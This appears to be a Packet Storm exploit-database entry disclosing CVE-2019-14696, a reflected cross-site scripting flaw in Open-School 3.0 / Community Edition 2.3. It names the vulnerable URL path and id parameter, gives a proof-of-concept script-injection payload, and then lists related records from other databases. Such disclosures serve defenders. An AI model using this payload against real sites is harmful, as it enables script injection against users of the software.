Lucene search
Greg PriestPACKETSTORM:153984HistoryAug 08, 2019 - 12:00 a.m.
Open-School 3.0 / Community Edition 2.3 Cross Site Scripting
2019-08-0800:00:00
Greg Priest
packetstormsecurity.com
69
EPSS
0.006
Percentile
78.0%
`# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]
Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.
/index.php?r=students/guardians/create&id=1[inject JavaScript Code]
Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
`
Related
zdt
zdt
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Vulnerability
2019-08-09 00:00:00
prion
prion
Design/Logic Flaw
2019-08-06 16:15:00
nvd
nvd
CVE-2019-14696
2019-08-06 16:15:11
exploitpack
exploitpack
Open-School 3.0 Community Edition 2.3 - Cross-Site Scripting
2019-08-08 00:00:00
cvelist
cvelist
CVE-2019-14696
2019-08-06 15:38:29
cve
cve
CVE-2019-14696
2019-08-06 16:15:11
nuclei
nuclei
Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
2020-09-04 15:46:07
exploitdb
exploitdb
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting
2019-08-08 00:00:00